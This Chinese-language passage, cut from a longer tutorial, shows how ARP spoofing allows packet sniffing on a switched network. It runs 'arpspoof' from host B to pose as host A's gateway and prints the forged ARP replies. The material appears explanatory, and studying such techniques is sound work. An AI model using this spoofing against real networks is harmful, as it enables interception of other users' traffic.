机,这样即使系统连接在交换机上,也不会影响对
数据包的攫取,由此就轻松的通过交换机实现了
网络监听。 举例如下:
主机a和b连接在交换机的同一个vlan上,
A机的ip地址:192.168.1.37
B机的ip地址:192.168.1.35,mac地址为:08-00-20-c8-fe-15
网关的ip地址:192.168.1.33,mac地址为:00-90-6d-f2-24-00
首先在a机上看看a机的arp表
C: >arp -a
nbsp; Interface: 192.168.1.37
Internet Address Physical Address Type
192.168.1.33 00-90-6d-f2-24-00 dynamic
我们看到a机中保留着网关的ip地址192.168.1.33和对应的mac地址00-90-6d-f2-24-00
我们在B机上执行arpspoof,将目标指向a机,宣称自己为网关,如下:
HOSTB# arpspoof -t 192.168.1.37 192.168.1.33
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
可以看到b机持续向a发送arp回应
